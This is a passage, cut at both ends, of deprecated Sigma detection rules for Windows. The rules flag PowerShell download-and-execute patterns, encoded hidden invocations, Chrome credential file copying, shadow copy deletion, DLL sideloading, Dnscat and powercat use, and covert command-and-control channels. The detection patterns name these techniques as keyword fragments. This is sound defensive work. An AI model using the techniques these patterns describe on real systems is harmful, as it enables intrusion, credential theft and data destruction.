references: - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ - https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml author: omkar72, oscd.community, Wojciech Lesicki date: 2020/10/12 modified: 2023/01/05 tags: - attack.execution - attack.defense_evasion - attack.t1059.001 - attack.t1218 logsource: category: file_event product: windows definition: Check your sysmon configuration for monitoring UsageLogs folder. In SwiftOnSecurity configuration we have that thanks @SBousseaden detection: selection: TargetFilename|contains|all: - '\AppData\Local\Microsoft\CLR' - '\UsageLogs\' TargetFilename|contains: - 'mshta' - 'cscript' - 'wscript' - 'regsvr32' - 'wmic' - 'rundll32' - 'svchost' condition: selection falsepositives: - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675 level: high ================================================ FILE: deprecated/windows/image_load_alternate_powershell_hosts_moduleload.yml ================================================ title: Alternate PowerShell Hosts - Image id: fe6e002f-f244-4278-9263-20e4b593827f status: deprecated description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2019/09/12 modified: 2023/06/01 tags: - attack.execution - attack.t1059.001 logsource: product: windows category: image_load detection: selection: Description: 'System.Management.Automation' ImageLoaded|contains: 'System.Management.Automation' filter_generic: - Image|endswith: - 
'\powershell.exe' - '\mscorsvw.exe' - Image|startswith: - 'C:\Program Files (x86)\Microsoft Visual Studio\' - 'C:\Program Files\Microsoft Visual Studio\' - 'C:\Windows\System32\' - 'C:\Program Files\Citrix\ConfigSync\' - Image: 'C:\Program Files\PowerShell\7\pwsh.exe' filter_aurora: # This filter is to avoid a race condition FP with this specific ETW provider in aurora Image: null condition: selection and not 1 of filter_* falsepositives: - Unknown level: low ================================================ FILE: deprecated/windows/image_load_office_dsparse_dll_load.yml ================================================ title: Active Directory Parsing DLL Loaded Via Office Application id: a2a3b925-7bb0-433b-b508-db9003263cc4 status: deprecated # In the AD Environment, dsparse.dll is loaded everytime an Office application is launched, so this rule is not useful. description: Detects DSParse DLL being loaded by an Office Product references: - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 author: Antonlovesdnb date: 2020-02-19 modified: 2025-10-17 tags: - attack.execution - attack.t1204.002 logsource: category: image_load product: windows detection: selection: Image|endswith: - '\excel.exe' - '\mspub.exe' - '\onenote.exe' - '\onenoteim.exe' # Just in case - '\outlook.exe' - '\powerpnt.exe' - '\winword.exe' ImageLoaded|contains: '\dsparse.dll' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/image_load_office_kerberos_dll_load.yml ================================================ title: Active Directory Kerberos DLL Loaded Via Office Application id: 7417e29e-c2e7-4cf6-a2e8-767228c64837 status: deprecated # In the AD Environment, kerberos.dll is loaded everytime an Office application is launched, so this rule is not useful. 
description: Detects Kerberos DLL being loaded by an Office Product references: - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 author: Antonlovesdnb date: 2020-02-19 modified: 2025-10-22 tags: - attack.execution - attack.t1204.002 logsource: category: image_load product: windows detection: selection: Image|endswith: - '\excel.exe' - '\mspub.exe' - '\onenote.exe' - '\onenoteim.exe' # Just in case - '\outlook.exe' - '\powerpnt.exe' - '\winword.exe' ImageLoaded|endswith: '\kerberos.dll' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/image_load_side_load_advapi32.yml ================================================ title: Suspicious Load of Advapi32.dll id: d813d662-785b-42ca-8b4a-f7457d78d5a9 status: deprecated description: Detects the load of advapi32.dll by a process running in an uncommon folder references: - https://github.com/hlldz/Phant0m author: frack113 date: 2022/02/03 modified: 2023/03/15 tags: - attack.defense_evasion - attack.t1070 logsource: product: windows category: image_load detection: selection: ImageLoaded|endswith: '\advapi32.dll' filter_common: Image|startswith: - 'C:\Windows\' - 'C:\Program Files (x86)\' - 'C:\Program Files\' filter_defender: Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\platform\' Image|endswith: '\MpCmdRun.exe' filter_onedrive: Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Microsoft\OneDrive\' Image|endswith: 'FileCoAuth.exe' condition: selection and not 1 of filter_* falsepositives: - Unknown level: informational ================================================ FILE: deprecated/windows/image_load_side_load_scm.yml ================================================ title: SCM DLL Sideload id: bc3cc333-48b9-467a-9d1f-d44ee594ef48 related: - id: 602a1f13-c640-4d73-b053-be9a2fa58b77 type: similar status: deprecated description: Detects DLL 
sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/01 modified: 2023/02/14 tags: - attack.defense_evasion - attack.persistence - attack.privilege_escalation - attack.t1574.001 logsource: category: image_load product: windows detection: selection: ImageLoaded: - 'C:\Windows\System32\WLBSCTRL.dll' - 'C:\Windows\System32\TSMSISrv.dll' - 'C:\Windows\System32\TSVIPSrv.dll' Image: 'C:\Windows\System32\svchost.exe' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/image_load_side_load_svchost_dlls.yml ================================================ title: Svchost DLL Search Order Hijack id: 602a1f13-c640-4d73-b053-be9a2fa58b77 status: deprecated description: | Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system. IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine. 
references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 author: SBousseaden date: 2019/10/28 modified: 2024/01/10 tags: - attack.persistence - attack.defense_evasion - attack.t1574.001 logsource: category: image_load product: windows detection: selection: Image|endswith: '\svchost.exe' ImageLoaded|endswith: - '\tsmsisrv.dll' - '\tsvipsrv.dll' - '\wlbsctrl.dll' filter: ImageLoaded|startswith: 'C:\Windows\WinSxS\' condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/image_load_susp_uncommon_image_load.yml ================================================ title: Possible Process Hollowing Image Loading id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7 status: deprecated # Needs to be a correlation rule description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz references: - https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html author: Markus Neis date: 2018/01/07 modified: 2024/01/22 tags: - attack.defense_evasion - attack.t1574.001 logsource: category: image_load product: windows detection: selection: Image|endswith: '\notepad.exe' ImageLoaded|endswith: - '\samlib.dll' - '\WinSCard.dll' condition: selection falsepositives: - Very likely, needs more tuning level: high ================================================ FILE: deprecated/windows/image_load_susp_winword_wmidll_load.yml ================================================ title: Windows Management Instrumentation DLL Loaded Via Microsoft Word id: a457f232-7df9-491d-898f-b5aabd2cbe2f status: deprecated description: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands references: - 
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 - https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/ - https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf author: Michael R. (@nahamike01) date: 2019/12/26 modified: 2022/05/14 tags: - attack.execution - attack.t1047 logsource: category: image_load product: windows detection: selection: Image|endswith: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' - '\outlook.exe' ImageLoaded|endswith: - '\wmiutils.dll' - '\wbemcomn.dll' - '\wbemprox.dll' - '\wbemdisp.dll' # - '\wbemsvc.dll' # too many FPs, tested with Win11 and O365 condition: selection falsepositives: - Possible. Requires further testing. level: informational ================================================ FILE: deprecated/windows/net_connection_win_binary_github_com.yml ================================================ title: Microsoft Binary Github Communication id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153 status: deprecated description: Detects an executable in the Windows folder accessing github.com references: - https://twitter.com/M_haggis/status/900741347035889665 - https://twitter.com/M_haggis/status/1032799638213066752 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1 author: Michael Haag (idea), Florian Roth (Nextron Systems) date: 2017/08/24 modified: 2023/04/18 tags: - attack.command_and_control - attack.t1105 - attack.exfiltration - attack.t1567.001 logsource: category: network_connection product: windows detection: selection: Initiated: 'true' DestinationHostname|endswith: - '.github.com' - '.githubusercontent.com' Image|startswith: 'C:\Windows\' condition: selection falsepositives: - Unknown - '@subTee in your network' level: high ================================================ 
FILE: deprecated/windows/net_connection_win_reddit_api_non_browser_access.yml ================================================ title: Suspicious Non-Browser Network Communication With Reddit API id: d7b09985-95a3-44be-8450-b6eadf49833e status: deprecated # In favour of 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7 description: Detects a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2 references: - https://github.com/kleiton0x00/RedditC2 - https://twitter.com/kleiton0x7e/status/1600567316810551296 - https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al author: Gavin Knapp date: 2023/02/16 modified: 2024/02/02 tags: - attack.command_and_control - attack.t1102 logsource: product: windows category: network_connection detection: selection: DestinationHostname|contains: 'reddit.com' # Match with Reddit API when you can # Other browsers or apps known to use reddit should be added # TODO: Add full paths for default install locations filter_optional_brave: Image|endswith: '\brave.exe' filter_optional_chrome: Image: - 'C:\Program Files\Google\Chrome\Application\chrome.exe' - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' filter_optional_firefox: Image: - 'C:\Program Files\Mozilla Firefox\firefox.exe' - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe' filter_optional_ie: Image: - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe' - 'C:\Program Files\Internet Explorer\iexplore.exe' filter_optional_maxthon: Image|endswith: '\maxthon.exe' filter_optional_edge_1: - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\' - Image|endswith: '\WindowsApps\MicrosoftEdge.exe' - Image: - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe' - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe' filter_optional_edge_2: Image|startswith: - 'C:\Program Files (x86)\Microsoft\EdgeCore\' - 
'C:\Program Files\Microsoft\EdgeCore\' Image|endswith: - '\msedge.exe' - '\msedgewebview2.exe' filter_optional_opera: Image|endswith: '\opera.exe' filter_optional_safari: Image|endswith: '\safari.exe' filter_optional_seamonkey: Image|endswith: '\seamonkey.exe' filter_optional_vivaldi: Image|endswith: '\vivaldi.exe' filter_optional_whale: Image|endswith: '\whale.exe' condition: selection and not 1 of filter_optional_* falsepositives: - Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc. level: medium ================================================ FILE: deprecated/windows/net_connection_win_susp_epmap.yml ================================================ title: Suspicious Epmap Connection id: 628d7a0b-7b84-4466-8552-e6138bc03b43 status: deprecated description: Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC) references: - https://github.com/RiccardoAncarani/TaskShell/ author: frack113, Tim Shelton (fps) date: 2022/07/14 modified: 2024/03/01 tags: - attack.lateral_movement logsource: category: network_connection product: windows detection: selection: Protocol: tcp Initiated: 'true' DestinationPort: 135 # DestinationPortName: epmap filter_image: Image|startswith: - C:\Windows\ - C:\ProgramData\Amazon\SSM\Update\amazon-ssm-agent-updater filter_image_null1: Image: null filter_image_null2: Image: '' filter_image_unknown: Image: '' condition: selection and not 1 of filter_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/pipe_created_psexec_pipes_artifacts.yml ================================================ title: PsExec Pipes Artifacts id: 9e77ed63-2ecf-4c7b-b09d-640834882028 status: deprecated description: Detecting use PsExec via Pipe Creation/Access to pipes references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view author: Nikita Nazarov, oscd.community date: 
2020/05/10 modified: 2023/08/07 tags: - attack.lateral_movement - attack.t1021.002 - attack.execution - attack.t1569.002 logsource: product: windows category: pipe_created definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|startswith: - 'psexec' - 'paexec' - 'remcom' - 'csexec' condition: selection falsepositives: - Legitimate Administrator activity level: medium ================================================ FILE: deprecated/windows/posh_pm_powercat.yml ================================================ title: Netcat The Powershell Version - PowerShell Module id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: deprecated description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/besimorhino/powercat - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md author: frack113 date: 2021/07/21 modified: 2023/01/20 tags: - attack.command_and_control - attack.t1095 logsource: product: windows category: ps_module definition: 'Requirements: PowerShell Module Logging must be enabled' detection: selection: ContextInfo|contains: - 'powercat ' - 'powercat.ps1' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/posh_ps_access_to_chrome_login_data.yml 
================================================ title: Accessing Encrypted Credentials from Google Chrome Login Database id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d status: deprecated author: frack113 date: 2021/12/20 modified: 2022/05/14 description: | Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md logsource: product: windows category: ps_script definition: Script block logging must be enabled detection: selection_cmd: ScriptBlockText|contains|all: - Copy-Item - '-Destination' selection_path: ScriptBlockText|contains: - '\Google\Chrome\User Data\Default\Login Data' - '\Google\Chrome\User Data\Default\Login Data For Account' condition: all of selection_* falsepositives: - Unknown level: medium tags: - attack.credential_access - attack.t1555.003 ================================================ FILE: deprecated/windows/posh_ps_azurehound_commands.yml ================================================ title: AzureHound PowerShell Commands id: 83083ac6-1816-4e76-97d7-59af9a9ae46e status: deprecated description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound references: - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html author: Austin Songer (@austinsonger) date: 2021/10/23 modified: 2023/01/02 tags: - attack.discovery - attack.t1482 - attack.t1087 - attack.t1087.001 - attack.t1087.002 - attack.t1069.001 - attack.t1069.002 - attack.t1069 logsource: product: 
windows category: ps_script definition: Script Block Logging must be enabled detection: selection: ScriptBlockText|contains: Invoke-AzureHound condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/posh_ps_cl_invocation_lolscript.yml ================================================ title: Execution via CL_Invocation.ps1 - Powershell id: 4cd29327-685a-460e-9dac-c3ab96e549dc status: deprecated description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module references: - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ - https://twitter.com/bohops/status/948061991012327424 author: oscd.community, Natalia Shornikova date: 2020/10/14 modified: 2023/08/17 tags: - attack.defense_evasion - attack.t1216 logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains|all: - 'CL_Invocation.ps1' - 'SyncInvoke' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/posh_ps_cl_mutexverifiers_lolscript.yml ================================================ title: Execution via CL_Mutexverifiers.ps1 id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 status: deprecated description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ - https://twitter.com/pabraeken/status/995111125447577600 author: oscd.community, Natalia Shornikova date: 2020/10/14 modified: 2023/08/17 tags: - attack.defense_evasion - attack.t1216 logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains|all: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' condition: selection falsepositives: - Unknown level: high 
================================================ FILE: deprecated/windows/posh_ps_dnscat_execution.yml ================================================ title: Dnscat Execution id: a6d67db4-6220-436d-8afc-f3842fe05d43 status: deprecated # In favour of the more generic Susp and Malicious Cmdlet rules description: Detects execution of the Dnscat exfiltration tool author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 modified: 2024/01/25 tags: - attack.exfiltration - attack.t1048 - attack.execution - attack.t1059.001 logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains: 'Start-Dnscat2' condition: selection falsepositives: - Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely) level: critical ================================================ FILE: deprecated/windows/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml ================================================ title: Suspicious PowerShell Mailbox SMTP Forward Rule id: 15b7abbb-8b40-4d01-9ee2-b51994b1d474 status: deprecated description: Detects usage of the PowerShell Set-Mailbox cmdlet to set up an SMTP forwarding rule. 
references: - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-10-26 modified: 2026-03-01 tags: - attack.exfiltration logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains|all: - 'Set-Mailbox ' - ' -DeliverToMailboxAndForward ' - ' -ForwardingSmtpAddress ' condition: selection falsepositives: - Legitimate usage of the cmdlet to forward emails level: medium ================================================ FILE: deprecated/windows/posh_ps_file_and_directory_discovery.yml ================================================ title: Powershell File and Directory Discovery id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 status: deprecated description: | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md author: frack113 date: 2021/12/15 modified: 2023/12/11 tags: - attack.discovery - attack.t1083 logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains: - ls - get-childitem - gci recurse: ScriptBlockText|contains: '-recurse' condition: selection and recurse falsepositives: - Unknown level: low ================================================ FILE: deprecated/windows/posh_ps_invoke_nightmare.yml ================================================ title: PrintNightmare Powershell Exploitation id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf status: deprecated description: Detects Commandlet name for PrintNightmare exploitation. references: - https://github.com/calebstewart/CVE-2021-1675 author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 modified: 2023/01/02 tags: - attack.privilege_escalation - attack.t1548 logsource: product: windows category: ps_script definition: Script Block Logging must be enabled detection: selection: ScriptBlockText|contains: 'Invoke-Nightmare' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/posh_ps_susp_gwmi.yml ================================================ title: Suspicious Get-WmiObject id: 0332a266-b584-47b4-933d-a00b103e1b37 status: deprecated description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers references: - https://attack.mitre.org/datasources/DS0005/ - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 author: frack113 date: 2022/01/12 modified: 2023/12/11 tags: - attack.persistence - attack.t1546 
logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains: - 'Get-WmiObject' - 'gwmi' filter_cl_utility: Path|endswith: '\CL_Utility.ps1' ScriptBlockText|contains|all: - 'function Get-FreeSpace' - 'SELECT * FROM Win32_LogicalDisk WHERE MediaType=12' condition: selection and not 1 of filter_* falsepositives: - Legitimate PowerShell scripts level: low ================================================ FILE: deprecated/windows/powershell_ps_susp_win32_shadowcopy.yml ================================================ title: Delete Volume Shadow Copies via WMI with PowerShell - PS Script id: e17121b4-ef2a-4418-8a59-12fb1631fa9e related: - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 type: similar - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 type: similar status: deprecated description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 date: 2021-12-26 modified: 2025-05-20 tags: - attack.impact - attack.t1490 logsource: product: windows category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: selection: ScriptBlockText|contains|all: - 'Get-WmiObject' - 'Win32_ShadowCopy' - '.Delete()' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/powershell_suspicious_download.yml ================================================ title: Suspicious PowerShell Download id: 65531a81-a694-4e31-ae04-f8ba5bc33759 status: deprecated description: Detects suspicious PowerShell download command tags: - attack.execution - attack.t1059.001 author: Florian Roth 
(Nextron Systems) date: 2017/03/05 modified: 2022/04/11 logsource: product: windows service: powershell detection: webclient: - 'System.Net.WebClient' download: - '.DownloadFile(' - '.DownloadString(' condition: webclient and download falsepositives: - PowerShell scripts that download content from the Internet level: medium ================================================ FILE: deprecated/windows/powershell_suspicious_invocation_generic.yml ================================================ title: Suspicious PowerShell Invocations - Generic id: 3d304fda-78aa-43ed-975c-d740798a49c1 status: deprecated description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution - attack.t1059.001 author: Florian Roth (Nextron Systems) date: 2017/03/12 modified: 2022/04/11 logsource: product: windows service: powershell detection: selection_encoded: - ' -enc ' - ' -EncodedCommand ' selection_hidden: - ' -w hidden ' - ' -window hidden ' - ' -windowstyle hidden ' selection_noninteractive: - ' -noni ' - ' -noninteractive ' condition: all of selection* falsepositives: - Very special / sneaky PowerShell scripts level: high ================================================ FILE: deprecated/windows/powershell_suspicious_invocation_specific.yml ================================================ title: Suspicious PowerShell Invocations - Specific id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c status: deprecated description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution - attack.t1059.001 author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro date: 2017/03/05 modified: 2023/05/04 logsource: product: windows service: powershell definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: selection_convert_b64: '|all': - '-nop' - ' -w ' - 'hidden' - ' -c ' - '[Convert]::FromBase64String' selection_iex: '|all': - ' -w ' - 'hidden' - '-noni' - '-nop' - ' -c ' - 'iex' - 'New-Object' 
selection_enc: '|all': - ' -w ' - 'hidden' - '-ep' - 'bypass' - '-Enc' selection_reg: '|all': - 'powershell' - 'reg' - 'add' - 'HKCU\software\microsoft\windows\currentversion\run' selection_webclient: '|all': - 'bypass' - '-noprofile' - '-windowstyle' - 'hidden' - 'new-object' - 'system.net.webclient' - '.download' selection_iex_webclient: '|all': - 'iex' - 'New-Object' - 'Net.WebClient' - '.Download' filter_chocolatey: - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" - "(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')" - 'Write-ChocolateyWarning' condition: 1 of selection_* and not 1 of filter_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/powershell_syncappvpublishingserver_exe.yml ================================================ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 related: - id: fde7929d-8beb-4a4c-b922-be9974671667 type: derived description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. 
references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ author: 'Ensar Şamil, @sblmsrsn, OSCD Community' date: 2020/10/05 modified: 2022/04/11 tags: - attack.defense_evasion - attack.t1218 logsource: product: windows service: powershell detection: selection: - 'SyncAppvPublishingServer.exe' condition: selection falsepositives: - App-V clients level: medium status: deprecated ================================================ FILE: deprecated/windows/proc_access_win_in_memory_assembly_execution.yml ================================================ title: Suspicious In-Memory Module Execution id: 5f113a8f-8b61-41ca-b90f-d374fa7e4a39 status: deprecated description: | Detects access to processes by other suspicious processes which have reflectively loaded libraries into their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a DLL loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. In addition, it is not common to see so few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown), which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. 
references: - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ author: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro date: 2019/10/27 modified: 2022/11/17 tags: - attack.privilege_escalation - attack.defense_evasion - attack.t1055.001 - attack.t1055.002 logsource: category: process_access product: windows detection: selection1: CallTrace|contains|all: - 'C:\WINDOWS\SYSTEM32\ntdll.dll+' - '|C:\WINDOWS\System32\KERNELBASE.dll+' - '|UNKNOWN(' - ')' selection2: CallTrace|contains|all: - 'UNKNOWN(' - ')|UNKNOWN(' CallTrace|endswith: ')' selection3: CallTrace|contains: 'UNKNOWN' GrantedAccess: - '0x1F0FFF' - '0x1F1FFF' - '0x143A' - '0x1410' - '0x1010' - '0x1F2FFF' - '0x1F3FFF' - '0x1FFFFF' filter: - SourceImage|endswith: - '\Windows\System32\sdiagnhost.exe' - '\procexp64.exe' - '\procexp.exe' - '\Microsoft VS Code\Code.exe' - '\aurora-agent-64.exe' - '\aurora-agent.exe' - '\git\usr\bin\sh.exe' - '\IDE\devenv.exe' - '\GitHubDesktop\Update.exe' - '\RuntimeBroker.exe' - '\backgroundTaskHost.exe' - '\GitHubDesktop.exe' - SourceImage|startswith: - 'C:\Program Files (x86)\' - 'C:\Program Files\' - 'C:\Windows\Microsoft.NET\Framework\\*\NGenTask.exe' - 'C:\Program Files (x86)\Microsoft Visual Studio\' - 'C:\Program Files\Microsoft Visual Studio\' - 'C:\Windows\Microsoft.NET\Framework' - 'C:\WINDOWS\System32\DriverStore\' - 'C:\Windows\System32\WindowsPowerShell\' - SourceImage: - 'C:\WINDOWS\system32\taskhostw.exe' - 'C:\WINDOWS\system32\ctfmon.exe' - 'C:\WINDOWS\system32\NhNotifSys.exe' - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' - 'C:\Windows\explorer.exe' - TargetImage: 'C:\Windows\System32\RuntimeBroker.exe' - TargetImage|endswith: '\Microsoft VS Code\Code.exe' - CallTrace|contains: '|C:\WINDOWS\System32\RPCRT4.dll+' # attempt to save the rule with a broader filter filter_set_1: SourceImage: 'C:\WINDOWS\Explorer.EXE' TargetImage: - 'C:\WINDOWS\system32\backgroundTaskHost.exe' - 
'C:\WINDOWS\explorer.exe' filter_msmpeng: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' SourceImage|endswith: '\MsMpEng.exe' filter_eclipse: SourceImage|endswith: '\eclipse.exe' CallTrace|contains: - '\jre\bin\java.dll' - '|C:\Windows\SYSTEM32\windows.storage.dll+' - '\configuration\org.eclipse.osgi\' filter_openwith: SourceImage: 'C:\Windows\system32\OpenWith.exe' TargetImage: 'C:\Windows\Explorer.EXE' filter_teams: SourceImage|startswith: 'C:\Users\' SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' TargetImage|endswith: - ':\Windows\Explorer.EXE' - '\AppData\Local\Microsoft\Teams\Update.exe' - '\AppData\Local\Microsoft\Teams\current\Teams.exe' - '\MsMpEng.exe' filter_wwahost: SourceImage: 'C:\Windows\System32\WWAHost.exe' TargetImage: 'C:\Windows\System32\svchost.exe' filter_sppsvc: SourceImage: C:\WINDOWS\system32\sppsvc.exe TargetImage: C:\WINDOWS\system32\SppExtComObj.exe condition: 1 of selection* and not 1 of filter* fields: - ComputerName - User - SourceImage - TargetImage - CallTrace falsepositives: - SysInternals Process Explorer level: low ================================================ FILE: deprecated/windows/proc_access_win_lazagne_cred_dump_lsass_access.yml ================================================ title: Credential Dumping by LaZagne id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0 status: stable description: Detects 